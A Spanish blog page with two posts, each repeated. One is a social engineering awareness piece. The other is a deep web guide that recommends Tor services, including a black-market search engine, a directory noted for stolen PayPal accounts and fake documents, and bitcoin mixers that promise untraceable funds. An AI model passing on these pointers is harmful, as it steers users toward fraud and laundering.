martes, 11 de febrero de 2020

Ingeniería social: el mayor riesgo de seguridad somos nosotros mismos

==============================================================================
==============================================================================
 Inscribite al curso de CEHv10
==============================================================================
==============================================================================

Uno de los hackers más populares de todos los tiempos, Kevin Mitnick, ha popularizado el término «Ingeniería social» durante los años 90. Sin embargo, las formas en que se aplican las distintas técnicas han existido desde siempre. Más adelante, te mostraremos las técnicas más populares. Muy probablemente, algunas de ellas podrán resultarte familiares para ti, especialmente en el ámbito laboral.
Esta es una técnica que se aprovecha de la psicología humana. Una popular definición dice que es «el arte de la explotación de la psicología humana». No se necesitan demasiados conocimientos técnicos para llevarla a la práctica. Sin embargo, la ingeniería social es el puente ideal para poder llevar a cabo otros ataques ya más complejos o específicos, como el Phishing.
Es increíble como todas las políticas de seguridad, todas las migraciones y mejoras a nivel infraestructura, prácticamente todo lo que esté relacionado a la tecnología, puedan quedar completamente inútiles por culpa del eslabón más débil de la cadena: el ser humano. Es necesaria una llamada telefónica de menos de 5 minutos, para poder tener acceso a informaciones que pueden resultar cruciales para la víctima, o bien, para la empresa para la cual está trabajando.
Una particularidad de esta técnica es el largo tiempo que se suele necesitar para poder prepararse para los ataques, más aún si es que el objetivo es atacar a una empresa. Se necesita estudiar el comportamiento de los colaboradores, prácticas corporativas, procedimientos, entre otras cosas relacionadas con la empresa, sin embargo, si podemos acceder a los datos de teléfono o email del objetivo, tomaría mucho menos tiempo. Generalmente, disponiendo de bases de datos filtradas, ya es posible perpetrar ataques por teléfono o correo electrónico. Así de rápido y fácil.

Casos populares de ingeniería social

Como ya mencionamos más arriba, la práctica de esta técnica vía telefónica es un hecho común. Un caso popular es recibir una llamada de alguien que dice ser de soporte técnico de (un ejemplo aleatorio) Gmail o Microsoft, y te comenta que es necesario actualizar tu contraseña y tus preguntas de seguridad ya que, si no lo hace, ya no tendrá acceso a su correo electrónico.
La inocencia y, por desgracia, la ignorancia de muchas personas, lleva a consecuencias no muy agradables. Millones de personas todos los años pierden el acceso a «cuentas menores» como el correo electrónico hasta cuentas mucho más delicadas como el correo corporativo, cuentas bancarias y accesos a sistemas de gestión.


Volviendo al ámbito empresarial. Un punto que no muchas personas comprenden del todo, es que es, si fuese el caso, solamente las personas que cuenten con tarjetas de acceso puedan acceder e irse de la oficina libremente. ¿Qué ocurre si una persona que usted no conoce le comenta que necesita acceder a la oficina, pero no cuenta con su tarjeta de acceso porque se le ha olvidado? ¿Qué pasa si es que le comenta que llega tarde y que uno de los gerentes solicitó su presencia lo antes posible?
El ser humano, por naturaleza, tiende a ayudar a la persona que lo necesita o que se encuentra en apuros. Entonces, le deja acceder. Sin embargo, los que practican estas técnicas de ingeniería social no necesitan ni deben acceder sin la autorización legítima previa. ¿Qué es lo peor que puede pasar si es que una persona no autorizada consigue acceder? Desde dejar dispositivos USB (con malware, ransomware, etc.) en el suelo para que se hagan pasar como «perdidos» hasta graves incidentes violentos.
No en vano existen empresas que aplican medidas muy estrictas, donde las personas que cuentan con tarjetas de acceso sean utilizadas solamente por ellas mismas. Sin posibilidad de prestar las tarjetas a ningún compañero, ni si quiera a sus jefes directos. El tiempo va dando cada vez más la razón a las políticas de Zero Trust, no sólo como una forma de mantener segura las redes, sino también un patrón de comportamiento que no confía en nada ni nadie.

Ingeniería social como puente para el Phishing

Se sabe que el Phishing es uno de los ataques más populares, principalmente por su eficacia y la facilidad con la que las víctimas caen. Una de las situaciones que se dan con más frecuencia, es cuando las personas caen en ataques de Phishing para que el atacante tenga acceso a cuentas bancarias.
Puede pasar que alguien te llame o te envíe un mail a nombre de tu banco, informándote que debes acceder a la banca online de manera urgente para poder actualizar tus datos, o caso contrario, perderías tus fondos disponibles. Recuerda, cualquier tipo de mensaje que incite a una acción urgente o que se haga lo antes posible, ya es un punto a tener muy en cuenta para dudar. Además, proporcionar información sensible vía telefónica a una persona que no conoces no es seguro, peor aún si es que te encuentras con personas que están muy próximas a ti y que podrían escucharte.
Por otro lado, estos tipos de ataques también se llevan a cabo mediante anuncios maliciosos que se despliegan en base a los intereses, preferencias y gustos de las víctimas. He ahí que queda en evidencia que la ingeniería social tiene un fuerte enfoque en el estudio de las personas y su comportamiento online sobre todas las cosas.

¿Cómo evitar caer en la trampa?

Lo principal ya es un secreto a voces: una práctica adecuada y eficaz de la conciencia de seguridad. Nunca ninguna medida de seguridad de la más alta tecnología va a ser eficaz, si es que la persona no cuenta con los conocimientos necesarios, y, sobre todo, conciencia acerca de la seguridad de los datos que maneja y el entorno en donde se encuentra. Nunca se debe proporcionar información sensible que te pertenezca vía telefónica, correo electrónico e incluso personalmente, si es que no es estrictamente necesario. Tampoco dejes acceder a personas ajenas o extrañas a la oficina donde trabajas sin la autorización correspondiente, sin importar la urgencia en que la persona dice estar. Ya lo sabemos, es mejor prevenir que curar.
Aprovechemos todas las utilidades que nuestras aplicaciones y servicios ofrecen para poder mantener seguros nuestros datos, sobre todo la verificación en dos pasos, ya que para poder acceder los cibercriminales no solamente necesitarán la contraseña sino también una clave adicional.

==============================================================================
==============================================================================
 Inscribite al curso de CEHv10
==============================================================================
==============================================================================

Ingeniería social: el mayor riesgo de seguridad somos nosotros mismos

==============================================================================
==============================================================================
 Inscribite al curso de CEHv10
==============================================================================
==============================================================================

Uno de los hackers más populares de todos los tiempos, Kevin Mitnick, ha popularizado el término «Ingeniería social» durante los años 90. Sin embargo, las formas en que se aplican las distintas técnicas han existido desde siempre. Más adelante, te mostraremos las técnicas más populares. Muy probablemente, algunas de ellas podrán resultarte familiares para ti, especialmente en el ámbito laboral.
Esta es una técnica que se aprovecha de la psicología humana. Una popular definición dice que es «el arte de la explotación de la psicología humana». No se necesitan demasiados conocimientos técnicos para llevarla a la práctica. Sin embargo, la ingeniería social es el puente ideal para poder llevar a cabo otros ataques ya más complejos o específicos, como el Phishing.
Es increíble como todas las políticas de seguridad, todas las migraciones y mejoras a nivel infraestructura, prácticamente todo lo que esté relacionado a la tecnología, puedan quedar completamente inútiles por culpa del eslabón más débil de la cadena: el ser humano. Es necesaria una llamada telefónica de menos de 5 minutos, para poder tener acceso a informaciones que pueden resultar cruciales para la víctima, o bien, para la empresa para la cual está trabajando.
Una particularidad de esta técnica es el largo tiempo que se suele necesitar para poder prepararse para los ataques, más aún si es que el objetivo es atacar a una empresa. Se necesita estudiar el comportamiento de los colaboradores, prácticas corporativas, procedimientos, entre otras cosas relacionadas con la empresa, sin embargo, si podemos acceder a los datos de teléfono o email del objetivo, tomaría mucho menos tiempo. Generalmente, disponiendo de bases de datos filtradas, ya es posible perpetrar ataques por teléfono o correo electrónico. Así de rápido y fácil.

Casos populares de ingeniería social

Como ya mencionamos más arriba, la práctica de esta técnica vía telefónica es un hecho común. Un caso popular es recibir una llamada de alguien que dice ser de soporte técnico de (un ejemplo aleatorio) Gmail o Microsoft, y te comenta que es necesario actualizar tu contraseña y tus preguntas de seguridad ya que, si no lo hace, ya no tendrá acceso a su correo electrónico.
La inocencia y, por desgracia, la ignorancia de muchas personas, lleva a consecuencias no muy agradables. Millones de personas todos los años pierden el acceso a «cuentas menores» como el correo electrónico hasta cuentas mucho más delicadas como el correo corporativo, cuentas bancarias y accesos a sistemas de gestión.


Volviendo al ámbito empresarial. Un punto que no muchas personas comprenden del todo, es que es, si fuese el caso, solamente las personas que cuenten con tarjetas de acceso puedan acceder e irse de la oficina libremente. ¿Qué ocurre si una persona que usted no conoce le comenta que necesita acceder a la oficina, pero no cuenta con su tarjeta de acceso porque se le ha olvidado? ¿Qué pasa si es que le comenta que llega tarde y que uno de los gerentes solicitó su presencia lo antes posible?
El ser humano, por naturaleza, tiende a ayudar a la persona que lo necesita o que se encuentra en apuros. Entonces, le deja acceder. Sin embargo, los que practican estas técnicas de ingeniería social no necesitan ni deben acceder sin la autorización legítima previa. ¿Qué es lo peor que puede pasar si es que una persona no autorizada consigue acceder? Desde dejar dispositivos USB (con malware, ransomware, etc.) en el suelo para que se hagan pasar como «perdidos» hasta graves incidentes violentos.
No en vano existen empresas que aplican medidas muy estrictas, donde las personas que cuentan con tarjetas de acceso sean utilizadas solamente por ellas mismas. Sin posibilidad de prestar las tarjetas a ningún compañero, ni si quiera a sus jefes directos. El tiempo va dando cada vez más la razón a las políticas de Zero Trust, no sólo como una forma de mantener segura las redes, sino también un patrón de comportamiento que no confía en nada ni nadie.

Ingeniería social como puente para el Phishing

Se sabe que el Phishing es uno de los ataques más populares, principalmente por su eficacia y la facilidad con la que las víctimas caen. Una de las situaciones que se dan con más frecuencia, es cuando las personas caen en ataques de Phishing para que el atacante tenga acceso a cuentas bancarias.
Puede pasar que alguien te llame o te envíe un mail a nombre de tu banco, informándote que debes acceder a la banca online de manera urgente para poder actualizar tus datos, o caso contrario, perderías tus fondos disponibles. Recuerda, cualquier tipo de mensaje que incite a una acción urgente o que se haga lo antes posible, ya es un punto a tener muy en cuenta para dudar. Además, proporcionar información sensible vía telefónica a una persona que no conoces no es seguro, peor aún si es que te encuentras con personas que están muy próximas a ti y que podrían escucharte.
Por otro lado, estos tipos de ataques también se llevan a cabo mediante anuncios maliciosos que se despliegan en base a los intereses, preferencias y gustos de las víctimas. He ahí que queda en evidencia que la ingeniería social tiene un fuerte enfoque en el estudio de las personas y su comportamiento online sobre todas las cosas.

¿Cómo evitar caer en la trampa?

Lo principal ya es un secreto a voces: una práctica adecuada y eficaz de la conciencia de seguridad. Nunca ninguna medida de seguridad de la más alta tecnología va a ser eficaz, si es que la persona no cuenta con los conocimientos necesarios, y, sobre todo, conciencia acerca de la seguridad de los datos que maneja y el entorno en donde se encuentra. Nunca se debe proporcionar información sensible que te pertenezca vía telefónica, correo electrónico e incluso personalmente, si es que no es estrictamente necesario. Tampoco dejes acceder a personas ajenas o extrañas a la oficina donde trabajas sin la autorización correspondiente, sin importar la urgencia en que la persona dice estar. Ya lo sabemos, es mejor prevenir que curar.
Aprovechemos todas las utilidades que nuestras aplicaciones y servicios ofrecen para poder mantener seguros nuestros datos, sobre todo la verificación en dos pasos, ya que para poder acceder los cibercriminales no solamente necesitarán la contraseña sino también una clave adicional.

==============================================================================
==============================================================================
 Inscribite al curso de CEHv10
==============================================================================
==============================================================================

lunes, 3 de febrero de 2020

¿No sabes qué hacer en la Deep web? Los mejores enlaces, sites y markets

Más allá de la capa de Internet que usamos cada día, que hay en los buscadores, está la Deep Web. Y nos permite encontrar todo tipo de contenido útil y relevante pero no siempre es fácil navegar por ella, puede resultar caótica para alguien que no lo ha hecho nunca pero recopilamos algunos de los mejores enlaces, sites o markets de la Deep Web para que encuentres cualquier cosa que busques.
Si no sabes por dónde empezar o si te has creído que todo es oscuro y peligroso, algunos de los enlaces, sites o markets de la Deep Web que encontrarás más adelante te demostrarán que no es así y que hay páginas y servicios online que poco o nada tienen que ver con cibercrimen y que no hace falta estar entre los mejores hackers de la historia para entrar en ella y poder aprovechar lo que ofrece.

¿Qué es la Deep Web?

La Deep Web es la Internet Profunda, la capa de Internet en la que encontramos todo el contenido que no está a la vista en buscadores. Todo lo que hay en la Deep Web no aparece como indexado en Google o en otros buscadores como Bing o Yahoo. Encontramos contenido no indexado pero de acceso público siempre que sepas dónde encontrar estos recursos o qué enlaces, sites o markets de la Deep Web puedes visitar para encontrar cualquier cosa que busques.

¿Qué hay?

Los mitos suelen decir que la Deep Web es peligrosa y oscura pero la realidad está bastante lejos de esto. No es un lugar peligroso aunque puede resultar algo caótico o más desordenado que lo que acostumbras con resultados indexados cuando buscas en Google. Más allá de lo que hayas podido escuchar, en la Deep Web hay todo tipo de informaciones sobre avances tecnológicos y científicos y documentos y recursos de todo tipo, especialmente prácticos para estudios, trabajos, investigaciones… Aunque, por supuesto, también encontraremos mercados de armas, venta de drogas, mercados y venta de documentación falsa, de libros clasificados o de pornografía y suele ser un lugar anónimo menos «acogedor» de lo que acostumbramos.

Deep Web vs Dark Web

No es lo mismo la Deep Web que la Dark Web. Solemos referirnos a la internet profunda como un todo pero también se hacen diferencias para dividir esta parte en dos: una zona que no está indexada pero en la que encontramos archivos de investigación o valiosos, como explicábamos en partes anteriores; y una zona oscura e ilegal, la Dark Web. Si lo imaginamos como un iceberg, sería bajar un escalón más y adentrarnos un poco más en la profundidad de Internet. En el caso de la Dark Web, puede ser usada por todo tipo de ciberdelincuentes para actividades poco lícitas sin ser detectados o encontrados pero no siempre es así y podemos navegar para conseguir algún tipo de información que necesitemos.
web deep web dark web

Cómo entrar

Para entrar en la Deep Web puedes hacerlo a través de un navegador especializado y es Tor Browser el más conocido y popular, aunque no el único. Conectarse a una red Tor es muy sencillo gracias a que el navegador lo hace todo por ti y no necesitarás ninguna experiencia ni configurar un proxy, sólo descargar el software en el dispositivo que quieras. Es compatible con Windows, Mac, Linux o Android y sólo debes ir a su página web, elegir el sistema operativo en el que quieres descargarlo y usarlo.
El uso de Tor Browser es bastante similar a cualquier otro navegador que uses habitualmente y puedes navegar por páginas de Internet superficial sin ningún problema pero también podrás acceder a dominios .onion que recopilamos a continuación y que te permitirán conocer todos los detalles. Para acceder a cualquiera de los dominios que encontrarás en los próximos párrafos, necesitarás antes descargar Tor Browser y copiar los enlaces en el navegador o abrirlos directamente desde el mismo.
  • Ve a la página de Tor Browser
  • Elige tu sistema operativo
  • Descarga el archivo en tu ordenador
  • Elige la carpeta de destino
  • Instala siguiendo el proceso
  • Ejecuta el navegador
También puedes hacerlo desde tu teléfono móvil Android o desde tu tableta.
Sólo pulsa en «Conectar» y copia cualquiera de los enlaces a continuación.

Los mejores buscadores

DuckDuckGo

DuckDuckGo es el motor de búsqueda predeterminado de Tor Browser y una buena opción disponible también para Internet superficial. Además, DuckDuckGo cuenta con una versión .onion que te permite acceder a cualquier parte. Sus principales ventajas es que la interfaz nos resultará conocida gracias a que es prácticamente idéntica a Google.
DuckDUckGo

The Hidden Wiki

Para navegar, uno de los mejores enlaces para la Deep Web es The Hidden Wiki. Un directorio con el que tendrás acceso a los principales enlaces, páginas, servicios u opciones que te permite esta parte de Internet y con todo tipo de temas perfectamente organizados y jerarquizados para que encuentres lo que buscas. Se trata de un proyecto colaborativo de los usuarios y podrás encontrar desde documentación falsa o cuentas PayPal robadas hasta información para mejorar la privacidad, etc. La ventaja de usar The Hidden Wiki es que podrás acceder directamente a cualquier enlace y encontrarás lo que sea.
the hidden wiki

Torch

Otro de los mejores buscadores y enlaces para la Deep Web es Torch, en funcionamiento desde hace casi veinte años y con una apariencia muy similar a la de Google pero con un funcionamiento bastante más complejo. La gran ventaja de Torch es que te ayudará a encontrarlo todo porque, en total, tiene más de un millón de páginas indexadas en su base de datos.
Torch

Not Evil

Usando la barra de búsqueda de Not Evil podrás encontrar todo lo que te propongas. Es uno de los mejores buscadores para la Deep Web y encontrarás páginas útiles de todo tipo, no tiene publicidad y es muy sencillo de utilizar y con una interfaz muy sencilla, muy básica y muy limpia.
notEvil

Grams

Para el mercado negro, Grams. Es uno de los mejores enlaces para la Deep Web si quieres buscar páginas de compra y venta. Está específicamente destinado a este tipo de contenidos.
Grams

Candle

Otro de los imprescindibles para los que buscan en la Deep Web es Candle. Usa la barra de búsqueda, escribe lo que necesitas y te mostrará una gran cantidad de resultados .onion para que puedas ir navegando por ellos.
Candle-Dark-Web

Enlaces, sites, markets…

Hidden Answers

Todos hemos utilizado alguna vez Yahoo Respuestas para saber o profundizar sobre un tema concreto. Hidden Answers es la versión de las profundidades de Internet donde los usuarios hacen todo tipo de preguntas sobre cualquier tema que se te pueda pasar por la cabeza. Usuarios que piden enlaces para acceder a servicios como Netflix, preguntas sobre cómo hackear cualquier cosa (una red social, una cuenta de Paypal…) o incluso para encontrar juegos pirateados.
Hidden-Answers

Torlinks

TorLinks es un directorio desde el que podrás acceder a diferentes enlaces de la Deep Web done encontrar información de cualquier tema que te interese. Es similar a The Hidden Wiki si quieres buscar páginas webs sobre alguna temática en concreto… Basta con ir por las distintas categorías, divididas en comercial y no comercial, y buscar el enlace que te convenza y necesites. Si no sabes muy bien cómo empezar en la DarkWeb, es una forma de organizarte o encontrar enlaces que necesites sobre un tema.
Torlinks

Cebolla Chan 3.0

Cebolla Chan es uno de los foros más conocidos de la Deep Web y uno de los más populares en español. En él encontrarás todo tipo de entradas sobre cualquier cosa que se te ocurra desde ofertas de trabajo hasta tutoriales bastante peculiares y diferentes. Hay miles de miembros registrados y está completamente en español por lo que podrás navegar por las categorías para ver qué dicen el resto de usuarios o registrarte para dar tu opinión o preguntar sobre algún tema que quieras o necesites.
Cebollachan

Facebook Deep Web

Facebook cuenta con una versión .onion que asegura no guardar registros y que es más seguro que el que usas habitualmente. No hay cambios en cuanto a interfaz y podrás usarlo con normalidad.
Facebook en la Deep Web

Connect

Connect es una red social en la Darknet. Según su propia descripción “Connect es el principal sitio social media en la Darknet” en el que los usuarios pueden hablar libremente de lo que quieran independientemente de su ideología. Podrás discutir de cualquier cosa que quieras. Según Connect “los usuarios podrán discutir cosas que normalmente no podrían y hablar de problemas que a menudo se pasan por alto en los medios públicos”. Una red social anónima donde tener “conversaciones” sin represalias que puedes probar si no te gusta demasiado Twitter o derivados.
Connect en la Deep Web

Mail2Tor

Mail2Tor es un servicio de correo electrónico enfocado a que podamos enviar o recibir mensajes manteniendo nuestra privacidad y de forma anónima. Es anónimo y su mayor finalidad es mantener la privacidad de los usuarios y, como es lógico, sólo podrás acceder al mismo a través de la red Tor y no a través de navegadores habituales como Google Chrome o Firefox.
Mail2Tor en la Deep Web

TorBox

TorBox es otro de los servicios de correos electrónicos más recomendables en la Deep Web. Basta con acceder al enlace, crear tu cuenta de correo y podrás enviar mensajes a otros usuarios con una interfaz bastante parecida a la de cualquier otro servicio similar. Podrás redactar y enviar mensajes, crear carpetas y organizar tus correos electrónicos recibidos, etc. Aunque busca ser seguro y privado, es importante que no uses datos personales reales como cuentas de correo electrónico o tu nombre real .
Torbox en la Deep Web

Imperial Library

Aunque hay muchas páginas webs en las que encontrar libros gratis sin acceder a la Deep Web, este es uno de los mejores sites para descargar gratuitamente libros y ebooks en inglés. Hay una colección de más de 100.000 títulos diferentes de cualquier género que se te ocurra o quieras descargar.
Imperial Library

Papyrefb2

También la biblioteca de PAPYREFB2 es una página destinada a encontrar miles de obras en formatos como ePub o Mobi y están disponibles en español. Puedes encontrar todo tipo de formatos y temáticas divididas por categorías y hay más de 30.000 libros disponibles de más de 10.000 autores diferentes. Poesía, teatro, narrativa, ciencias o humanidades entre algunas de las categorías. Podrás elegir filtrar por categoría, por género, por temática o por fecha. O bien podrás buscar el que te interese.
Papyrefb2

DeepWeb Radio

Como su propio nombre indica, una rao a la que podrás acceder a distintas emisoras de temáticas diferentes. Desde emisoras de jazz, de country, emisoras para poner música ambiente o cualquier otro género que te interese. Sólo tienes que entrar, buscar lo que te guste y pulsar el play o acceder al URL que viene indicado en cada uno de los distintos apartados.
Deepradio en la Deep Web

TorShops

TorShops nos permite crear nuestra propia tienda .onion para vender cualquier cosa. Cuenta con centro de mensajes para comunicarse con los clientes, seguimiento de pedidos, gestión de inventario, monedero integrado de bitcoin o permite el acceso a muchas plantillas de diseño gratuitas para que sea accesible incluso si no tienes ni idea. También hay plantillas de pago o podrás acceder o crear tu propio logotipo personalizado para la tienda que vayas a poner en marcha.
TorShops

WeBuyBitcoins

Como su propio nombre indica, WeBuyBitcoins es una página web en la que podrás vender tus bitcoins con un método bastante sencillo y recibirás tu dinero en varias divisas disponibles o en PayPal.
WeBuyBitcoins

Hidden Wallet

Hidden Wallet es un monedero oculto en el que puedes guardar tus bitocins.  Promete tener seguridad de alto grado y no acceder nunca a tus contraseñas o información privada. “Para evitar el rastro mezclamos todos sus bitcoins y así el rastreo es imposible”, aseguran desde su página web y pretende mantener a salvo la identidad real de cualquier usuario que lo utilice.
Hidden Wallet

EasyCoin

Easy Coin es también un monedero Bitcoin que los mezcla de forma gratuita. Almacena todos los bitcoins encritados y los protege de posibles cibedelincuentes, lo hace de forma anónima y es compatible desde cualquier ordenador si usas Tor Browser en tu tablet Android o iOS o en tu móvil.
EasyCoin

Tor Metrics

Tor Metrics es una página web en la que encontrarás toda la información que necesitas sobre esta red. Puedes acceder a una fuente de noticias, a analíticas de tráfico… Todo lo que necesites saber sobre la red Tor, está en esta página web en la que verás gráficos con el número de clientes conectados e incluso qué países son los que más acceden de forma anónima a la red Tor o cuáles son los que menos. Datos muy interesantes para los curiosos.
TorMetrics

¿No sabes qué hacer en la Deep web? Los mejores enlaces, sites y markets

¿No sabes qué hacer en la Deep web? Los mejores enlaces, sites y markets

Más allá de la capa de Internet que usamos cada día, que hay en los buscadores, está la Deep Web. Y nos permite encontrar todo tipo de contenido útil y relevante pero no siempre es fácil navegar por ella, puede resultar caótica para alguien que no lo ha hecho nunca pero recopilamos algunos de los mejores enlaces, sites o markets de la Deep Web para que encuentres cualquier cosa que busques.
Si no sabes por dónde empezar o si te has creído que todo es oscuro y peligroso, algunos de los enlaces, sites o markets de la Deep Web que encontrarás más adelante te demostrarán que no es así y que hay páginas y servicios online que poco o nada tienen que ver con cibercrimen y que no hace falta estar entre los mejores hackers de la historia para entrar en ella y poder aprovechar lo que ofrece.

¿Qué es la Deep Web?

La Deep Web es la Internet Profunda, la capa de Internet en la que encontramos todo el contenido que no está a la vista en buscadores. Todo lo que hay en la Deep Web no aparece como indexado en Google o en otros buscadores como Bing o Yahoo. Encontramos contenido no indexado pero de acceso público siempre que sepas dónde encontrar estos recursos o qué enlaces, sites o markets de la Deep Web puedes visitar para encontrar cualquier cosa que busques.

¿Qué hay?

Los mitos suelen decir que la Deep Web es peligrosa y oscura pero la realidad está bastante lejos de esto. No es un lugar peligroso aunque puede resultar algo caótico o más desordenado que lo que acostumbras con resultados indexados cuando buscas en Google. Más allá de lo que hayas podido escuchar, en la Deep Web hay todo tipo de informaciones sobre avances tecnológicos y científicos y documentos y recursos de todo tipo, especialmente prácticos para estudios, trabajos, investigaciones… Aunque, por supuesto, también encontraremos mercados de armas, venta de drogas, mercados y venta de documentación falsa, de libros clasificados o de pornografía y suele ser un lugar anónimo menos «acogedor» de lo que acostumbramos.

Deep Web vs Dark Web

No es lo mismo la Deep Web que la Dark Web. Solemos referirnos a la internet profunda como un todo pero también se hacen diferencias para dividir esta parte en dos: una zona que no está indexada pero en la que encontramos archivos de investigación o valiosos, como explicábamos en partes anteriores; y una zona oscura e ilegal, la Dark Web. Si lo imaginamos como un iceberg, sería bajar un escalón más y adentrarnos un poco más en la profundidad de Internet. En el caso de la Dark Web, puede ser usada por todo tipo de ciberdelincuentes para actividades poco lícitas sin ser detectados o encontrados pero no siempre es así y podemos navegar para conseguir algún tipo de información que necesitemos.
web deep web dark web

Cómo entrar

Para entrar en la Deep Web puedes hacerlo a través de un navegador especializado y es Tor Browser el más conocido y popular, aunque no el único. Conectarse a una red Tor es muy sencillo gracias a que el navegador lo hace todo por ti y no necesitarás ninguna experiencia ni configurar un proxy, sólo descargar el software en el dispositivo que quieras. Es compatible con Windows, Mac, Linux o Android y sólo debes ir a su página web, elegir el sistema operativo en el que quieres descargarlo y usarlo.
El uso de Tor Browser es bastante similar a cualquier otro navegador que uses habitualmente y puedes navegar por páginas de Internet superficial sin ningún problema pero también podrás acceder a dominios .onion que recopilamos a continuación y que te permitirán conocer todos los detalles. Para acceder a cualquiera de los dominios que encontrarás en los próximos párrafos, necesitarás antes descargar Tor Browser y copiar los enlaces en el navegador o abrirlos directamente desde el mismo.
  • Ve a la página de Tor Browser
  • Elige tu sistema operativo
  • Descarga el archivo en tu ordenador
  • Elige la carpeta de destino
  • Instala siguiendo el proceso
  • Ejecuta el navegador
También puedes hacerlo desde tu teléfono móvil Android o desde tu tableta.
Sólo pulsa en «Conectar» y copia cualquiera de los enlaces a continuación.

Los mejores buscadores

DuckDuckGo

DuckDuckGo es el motor de búsqueda predeterminado de Tor Browser y una buena opción disponible también para Internet superficial. Además, DuckDuckGo cuenta con una versión .onion que te permite acceder a cualquier parte. Sus principales ventajas es que la interfaz nos resultará conocida gracias a que es prácticamente idéntica a Google.
DuckDUckGo

The Hidden Wiki

Para navegar, uno de los mejores enlaces para la Deep Web es The Hidden Wiki. Un directorio con el que tendrás acceso a los principales enlaces, páginas, servicios u opciones que te permite esta parte de Internet y con todo tipo de temas perfectamente organizados y jerarquizados para que encuentres lo que buscas. Se trata de un proyecto colaborativo de los usuarios y podrás encontrar desde documentación falsa o cuentas PayPal robadas hasta información para mejorar la privacidad, etc. La ventaja de usar The Hidden Wiki es que podrás acceder directamente a cualquier enlace y encontrarás lo que sea.
the hidden wiki

Torch

Otro de los mejores buscadores y enlaces para la Deep Web es Torch, en funcionamiento desde hace casi veinte años y con una apariencia muy similar a la de Google pero con un funcionamiento bastante más complejo. La gran ventaja de Torch es que te ayudará a encontrarlo todo porque, en total, tiene más de un millón de páginas indexadas en su base de datos.
Torch

Not Evil

Usando la barra de búsqueda de Not Evil podrás encontrar todo lo que te propongas. Es uno de los mejores buscadores para la Deep Web y encontrarás páginas útiles de todo tipo, no tiene publicidad y es muy sencillo de utilizar y con una interfaz muy sencilla, muy básica y muy limpia.
notEvil

Grams

Para el mercado negro, Grams. Es uno de los mejores enlaces para la Deep Web si quieres buscar páginas de compra y venta. Está específicamente destinado a este tipo de contenidos.
Grams

Candle

Otro de los imprescindibles para los que buscan en la Deep Web es Candle. Usa la barra de búsqueda, escribe lo que necesitas y te mostrará una gran cantidad de resultados .onion para que puedas ir navegando por ellos.
Candle-Dark-Web

Enlaces, sites, markets…

Hidden Answers

Todos hemos utilizado alguna vez Yahoo Respuestas para saber o profundizar sobre un tema concreto. Hidden Answers es la versión de las profundidades de Internet donde los usuarios hacen todo tipo de preguntas sobre cualquier tema que se te pueda pasar por la cabeza. Usuarios que piden enlaces para acceder a servicios como Netflix, preguntas sobre cómo hackear cualquier cosa (una red social, una cuenta de Paypal…) o incluso para encontrar juegos pirateados.
Hidden-Answers

Torlinks

TorLinks es un directorio desde el que podrás acceder a diferentes enlaces de la Deep Web done encontrar información de cualquier tema que te interese. Es similar a The Hidden Wiki si quieres buscar páginas webs sobre alguna temática en concreto… Basta con ir por las distintas categorías, divididas en comercial y no comercial, y buscar el enlace que te convenza y necesites. Si no sabes muy bien cómo empezar en la DarkWeb, es una forma de organizarte o encontrar enlaces que necesites sobre un tema.
Torlinks

Cebolla Chan 3.0

Cebolla Chan es uno de los foros más conocidos de la Deep Web y uno de los más populares en español. En él encontrarás todo tipo de entradas sobre cualquier cosa que se te ocurra desde ofertas de trabajo hasta tutoriales bastante peculiares y diferentes. Hay miles de miembros registrados y está completamente en español por lo que podrás navegar por las categorías para ver qué dicen el resto de usuarios o registrarte para dar tu opinión o preguntar sobre algún tema que quieras o necesites.
Cebollachan

Facebook Deep Web

Facebook cuenta con una versión .onion que asegura no guardar registros y que es más seguro que el que usas habitualmente. No hay cambios en cuanto a interfaz y podrás usarlo con normalidad.
Facebook en la Deep Web

Connect

Connect es una red social en la Darknet. Según su propia descripción “Connect es el principal sitio social media en la Darknet” en el que los usuarios pueden hablar libremente de lo que quieran independientemente de su ideología. Podrás discutir de cualquier cosa que quieras. Según Connect “los usuarios podrán discutir cosas que normalmente no podrían y hablar de problemas que a menudo se pasan por alto en los medios públicos”. Una red social anónima donde tener “conversaciones” sin represalias que puedes probar si no te gusta demasiado Twitter o derivados.
Connect en la Deep Web

Mail2Tor

Mail2Tor es un servicio de correo electrónico enfocado a que podamos enviar o recibir mensajes manteniendo nuestra privacidad y de forma anónima. Es anónimo y su mayor finalidad es mantener la privacidad de los usuarios y, como es lógico, sólo podrás acceder al mismo a través de la red Tor y no a través de navegadores habituales como Google Chrome o Firefox.
Mail2Tor en la Deep Web

TorBox

TorBox es otro de los servicios de correos electrónicos más recomendables en la Deep Web. Basta con acceder al enlace, crear tu cuenta de correo y podrás enviar mensajes a otros usuarios con una interfaz bastante parecida a la de cualquier otro servicio similar. Podrás redactar y enviar mensajes, crear carpetas y organizar tus correos electrónicos recibidos, etc. Aunque busca ser seguro y privado, es importante que no uses datos personales reales como cuentas de correo electrónico o tu nombre real .
Torbox en la Deep Web

Imperial Library

Aunque hay muchas páginas webs en las que encontrar libros gratis sin acceder a la Deep Web, este es uno de los mejores sites para descargar gratuitamente libros y ebooks en inglés. Hay una colección de más de 100.000 títulos diferentes de cualquier género que se te ocurra o quieras descargar.
Imperial Library

Papyrefb2

También la biblioteca de PAPYREFB2 es una página destinada a encontrar miles de obras en formatos como ePub o Mobi y están disponibles en español. Puedes encontrar todo tipo de formatos y temáticas divididas por categorías y hay más de 30.000 libros disponibles de más de 10.000 autores diferentes. Poesía, teatro, narrativa, ciencias o humanidades entre algunas de las categorías. Podrás elegir filtrar por categoría, por género, por temática o por fecha. O bien podrás buscar el que te interese.
Papyrefb2

DeepWeb Radio

Como su propio nombre indica, una rao a la que podrás acceder a distintas emisoras de temáticas diferentes. Desde emisoras de jazz, de country, emisoras para poner música ambiente o cualquier otro género que te interese. Sólo tienes que entrar, buscar lo que te guste y pulsar el play o acceder al URL que viene indicado en cada uno de los distintos apartados.
Deepradio en la Deep Web

TorShops

TorShops nos permite crear nuestra propia tienda .onion para vender cualquier cosa. Cuenta con centro de mensajes para comunicarse con los clientes, seguimiento de pedidos, gestión de inventario, monedero integrado de bitcoin o permite el acceso a muchas plantillas de diseño gratuitas para que sea accesible incluso si no tienes ni idea. También hay plantillas de pago o podrás acceder o crear tu propio logotipo personalizado para la tienda que vayas a poner en marcha.
TorShops

WeBuyBitcoins

Como su propio nombre indica, WeBuyBitcoins es una página web en la que podrás vender tus bitcoins con un método bastante sencillo y recibirás tu dinero en varias divisas disponibles o en PayPal.
WeBuyBitcoins

Hidden Wallet

